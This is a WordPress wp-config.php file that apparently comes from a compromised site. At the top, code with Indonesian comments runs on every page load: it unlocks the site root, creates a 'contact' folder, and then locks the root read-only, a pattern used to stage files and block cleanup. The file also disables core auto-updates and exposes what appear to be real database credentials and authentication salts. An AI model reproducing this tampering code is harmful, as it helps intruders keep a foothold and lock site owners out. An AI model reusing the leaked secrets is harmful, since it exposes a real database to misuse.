<?php
define( 'WP_CACHE', true );
/** Membuka kunci public_html sementara (jika script punya otoritas) */
@chmod(ABSPATH, 0755);
$target_folder = ABSPATH . 'contact';
if (!file_exists($target_folder)) {
@mkdir($target_folder, 0755, true);
}
/** Mengunci kembali public_html menjadi Read-Only */
@chmod(ABSPATH, 0555);
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u336066629_AmAL87tCa_X2WLMZR2U1eL' );
/** Database username */
define( 'DB_USER', 'u336066629_AmAL87tCa_No6JQi' );
/** Database password */
define( 'DB_PASSWORD', 'ZXXPtKBVtod3uPK0ImmkbGkKMJcFvn' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'nKqe7)?jaeH*=9S:1(6|m|CHvYI357><%jFsq?;e/e%7.brmJf-$L=:/GZ/*#=w:' );
define( 'SECURE_AUTH_KEY', 'H@duN<B,lz5d4A+D+;ARSl/hWHg:98j=Ja,TWA8amU 3;?l(WZ.erIq{MW+l)6gO' );
define( 'LOGGED_IN_KEY', 'Q w*<]rw~klWZGy&@sBzMEsLj9+s>nH+[*M4G@m1`N/N6BOgen+d`3i%L*pi!hyj' );
define( 'NONCE_KEY', '&aDKZW[k;Y%md:Jbu-@?RB%0Sa`+/N)-+=x(B, R&y?4q!GA07(]7,cC%:-b4!*=' );
define( 'AUTH_SALT', '-f;`}LT;#[>e,e>SJ|.,]->|:5L`j~_b4pb@B]Bg ~bM2:v>b.9Kg2tO;-SIaR~,' );
define( 'SECURE_AUTH_SALT', 'h|.fBaGntyYH V@%q/Im9.Mfgls tBL]Aa9U*{RwLd|93U{;$j%01-mH5H[pjr?6' );
define( 'LOGGED_IN_SALT', 'aT+Gy]k|RSPq4G#_<8CD}OAb;mvfy~lxF^~m0CK?z5gC5=SdjsMVzd:qk >S CO$' );
define( 'NONCE_SALT', '+{(rG*]F(<&nmVp/<{B/m4K3.29<&xPCx[!;_hPi[G%0t:>u<meimfWQ{63l U*d' );
define( 'WP_CACHE_KEY_SALT', '<<}`r<^WbKT_S1VMTpr6xMh;vF!N)ZG3&pdF1re<]c!H5k[J@V]bO|gDiiiy};^x' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/* Add any custom values between this line and the "stop editing" line. */
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
define( 'WP_AUTO_UPDATE_CORE', false );
define( 'FS_METHOD', 'direct' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';